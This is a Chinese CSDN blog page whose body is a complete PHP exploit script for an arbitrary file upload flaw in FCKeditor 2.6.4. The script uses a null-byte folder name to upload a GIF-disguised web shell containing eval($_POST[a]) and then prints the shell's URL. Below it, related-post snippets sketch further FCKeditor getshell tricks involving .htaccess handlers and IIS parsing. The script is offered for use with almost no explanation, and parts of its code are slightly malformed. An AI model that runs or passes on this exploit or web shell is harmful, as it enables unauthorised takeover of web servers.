fckeditor 2 6 4 任意文件上传漏洞

最新推荐文章于 2024-05-14 06:36:46 发布
最新推荐文章于 2024-05-14 06:36:46 发布
阅读量6.3k 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ytfhjhv/article/details/83987568
版权
fckeditor 2 6 4 任意文件上传漏洞
摘要由CSDN通过智能技术生成

分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow

也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!

                
<?error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){ $sock = fsockopen($host, 80); while (!$sock) {  print "\n[-] No response from {$host}:80 Trying again...";  $sock = fsockopen($host, 80); } fputs($sock, $packet); while (!feof($sock)) $resp .= fread($sock, 1024); fclose($sock); print $resp; return $resp;}function connector_response($html)global $match; return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));}print "\n+------------------------------------------------------------------+";print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ     |";print "\n+------------------------------------------------------------------+\n";if ($argc < 3){ print "\nUsage......: php $argv[0] host path\n"print "\nExample....: php $argv[0] localhost /\n"print "\nExample....: php $argv[0] localhost /FCKEditor/\n"die();}$host = $argv[1];$path = ereg_replace("(/){2,}", "/", $argv[2]);$filename  = "fvck.gif";$foldername = "fuck.php%00.gif";$connector = "editor/filemanager/connectors/php/connector.php";$payload  = "-----------------------------265001916915724\r\n";$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";$payload .= "Content-Type:  image/jpeg\r\n\r\n";$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";$payload .= "-----------------------------265001916915724--\r\n";$packet  = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print $packet;$packet .= "Host: {$host}\r\n";$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";$packet .= "Content-Length: ".strlen($payload)."\r\n";$packet .= "Connection: close\r\n\r\n";$packet .= $payload;print $packet;if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");else print "\n[-] Job done! try http://${host}/$match[2] \n";?>

           

给我老师的人工智能教程打call!http://blog.csdn.net/jiangjunshow
最低0.47元/天 解锁文章
云生2342
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fckeditor文件上传getshell
千寻的博客
05-17 3306
第二次上传之后是111(1).asp(此时发现已经存在,进行重命名,进行截断)4、更改后缀.asp txt文件,使用hex更改20–00。window server 2019 的IIS搭建的网站。第一次上传之后是111.asp_txt(此时.变成了_)2、发现可以上传一个txt后缀的文件。3、但是无法上传asp的文件。发现存在FCKeditor。1、访问编辑器,进行上传。
fckeditor编辑器上传——含有点变成下划线限制的源码包
12-08
5. **文件上传漏洞**:文件上传漏洞通常是指攻击者能够通过上传恶意文件来获取服务器的控制权,执行任意代码,或者破坏网站内容。在这个场景中,由于Fckeditor的限制不严,攻击者可能能上传带有特殊字符或者扩展名的...
FCKeditor 2.6.3 上传图片成功 但IE提示无权限的解决方法
shirlly
04-22 126
.net 2.0 VS2008 FCKeditor最新版本2.6.3 fck的基本设置都完成,上传权限全部开放\editor\filemanager\connectors\aspx 下 config.ascx 文件上传和浏览的权限检查 全部返回true 测试 浏览文件夹正常 在上传里面 点击上传 一直loading ie左下角出现错误提示:没有权限,无...
2024年最新fckeditor编辑器上传漏洞getshell——突破(1),2024物联网嵌入式开发不死我不倒
最新发布
2401_85011796的博客
05-14 878
百度搜索fckeditor编辑器漏洞利用,找到参考链接:https://www.cnblogs.com/milantgh/p/3775396.html,按照链接中常用上传地址挨个进行测试。访问上传的文件后,发现是图片,并没有当作asp进行解析。_x(1).jpg,以前这种方法是可以的,但这个环境不可以,知道此方法就行。接下来,查看目标网站搭建平台,发现是IIS6.0,那么可以结合IIS6.0的解析漏洞进行利用。测试过程中发现第三个会弹窗提示,说明没有访问到上传目录,那么添加…上传logo.asp;
【信安学习笔记三】文件上传
weixin_43374106的博客
08-09 1079
个人学习参考用笔记 目录前言一、(一)域名 前言 xxxxxx 一、 (一)域名 标题
编辑器文件上传简介及演示-CMS文件上传简介及演示-文件上传漏洞分析详细流程
ran的博客
02-02 787
在某些网站里,可能会套用第三方的编辑器,来对图片、音频、文章等做相关处理,因此如果网站内有编辑器的话,编辑器的类型、版本也是我们进行渗透的一个点,大部分的编辑器漏洞都是文件上传漏洞。在网上有很多网站开源原码(简称CMS),CMS原码也可能会有相应的文件上传漏洞,只需要在网上查找相应漏洞,便可以进行突破。
FCKeditor 2.6.4 php版本任意文件上传——漏洞复现
W小哥
06-17 7349
一、漏洞描述 FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行,互联网上很容易找到相关技术文档,国内许多Web项目和大型网站均采用了FCKeditor。 Fckeditor 低于 2.6.4 php 版本任意文件上传漏洞,当您的PHP环境配置为 GPC = Off 时可绕过currentfolder参数过滤上传脚本木马控制网站服务器 二、漏洞原理 漏洞版本:<=2.6.4 三、环境搭建
复现awvs——FCKeditor 任意文件上传漏洞思维引导到getshell
记录并分享学习安全的知识点..
03-20 6546
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、复习文件解析漏洞 解析漏洞,是指中间件(Apache、nginx、iis等)在解析文件时出现了漏洞,从而,黑客可以利用该漏洞实现非法文件的解析。 (一)Apache解析漏洞 Apache解析文件规则是从右到左。例如shel.php.gix.ccc,apache会先识别ccc,ccc不被识别,则识别gix,以此类推,最后会被识别为php来运行。 文件解析漏洞总结-Apache_1stPeak的博客-CSDN...
30.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御(三)1
08-03
文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御(三)1 本文是作者的网络安全自学教程系列的一部分,主要关注的是如何理解和防范网络安全中的某些常见漏洞。作者强调反对利用这些知识进行非法活动,鼓励读者以保护...
fckeditor2.66精简修正版(修正最新上传漏洞ASP版)
05-23
2. `fckconfig.js`:配置文件,用于设置Fckeditor的各种选项,如工具栏按钮、文件上传路径等,开发者可以在这里定制编辑器的行为。 3. `fckeditor.js`:编辑器的核心JavaScript文件,包含了大部分的编辑器功能实现。...
fckeditor的0DAY
10-22
fckeditor的0DAYfckeditor的0DAY
Fckeditor(综合利用工具).zip
01-03
文件上传漏洞允许攻击者上传恶意代码到服务器,一旦用户访问含有恶意文件的页面,可能导致服务器被控制或数据被盗取。XSS漏洞则可能使攻击者通过注入脚本代码来获取用户敏感信息。SQL注入漏洞则可能导致攻击者执行...
Fckeditor上传漏洞
PandaQ的博客
11-02 2799
转自:http://www.chncto.com/heikejishu/10684.html 分享一些关于Fckeditor漏洞利用总结 1.查看编辑器版本 FCKeditor/_whatsnew.html ———————————————————————————————————————————————————————————...
fckeditor任意文件上传漏洞
u012684933的专栏
02-26 6253
1. 创建.htaccess文件,内容如下: <FilesMatch "_php.gif"> SetHandler application/x-httpd-php .htaccess文件可以用来设置某个目录和某个目录的子目录的权限,以上内容的意思是将扩展名是"_php.gif"的文件解析成php 2.使用如下url,上
FCKeditor文件上传配置
Java_han的专栏
08-30 2706
FCKeditor编辑功能的使用 下载并解压FCKeditor放于WebRoot目录下 在使用页面引入fckeditor目录下的fckeditor.js <script type="text/javascript" src="./fckeditor/fckeditor.js"></script> 使用如下代码调用显示 <script type="te
FCKeditor上传设置
MascotDai的专栏
10-30 1098
看大家要FCKeditor上传设置的部分,所以仔细找了下,以前看到别人说FCKeditor有上传漏洞,所以一直没有用过此功能!希望能够解决大家的问题!因版本更新问题,可能具体行数不一致,请大家仔细修改!谢谢大家的关注!FCKeditor目前已经更新到2.4.2版,详情请看官方http://www.fckeditor.net/上传文件设置简洁fckconfig.js 134 135 行[
fckeditor如何能实现直接粘贴把图片上传到服务器中
Mr_Zang666的博客
03-31 186
"Servers" :[{"url":"www.ncmem.com"},{"url":"www.xproerui.com"}]//内部服务器地址(不下载此地址中的图片)JPG/PNG/GIF/BMP,推荐使用JPG格式,防止出现大图片。, "PasteImageType" : "" //粘贴文件,剪帖板的图片格式,为空表示本地图片格式。, "PasteImgSrc" : "" //shape:优先使用源公式图片,img:使用word自动生成的图片。
nginx 上传文件漏洞_FCKeditor/phpok文件上传漏洞复现
weixin_36212732的博客
12-29 876
人不可能十全十美,十分能耐使七分,留下三分给儿孙。俗话说得好FCKeditor_v2.4.31、前言常见的文本编辑器如FCKeditor、Ewebeditor、UEditor、KindEditor、XHeditor等,因其包含有文件上传接口,导致经常出现安全缺陷。这里主要对 FCKeditor 编辑器的历史文件上传漏洞做复现。2、FCKeditor常用上传地址fckeditor/edit...
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御
qq_50854662的博客
11-08 4697
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御
FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor1
08-03
"FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor1" FCKeditor(现称为CKeditor)是CKSource公司的一款开源的所见即所得(WYSIWYG)文本编辑器,可以集成到网络应用中,为用户提供类似文字...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值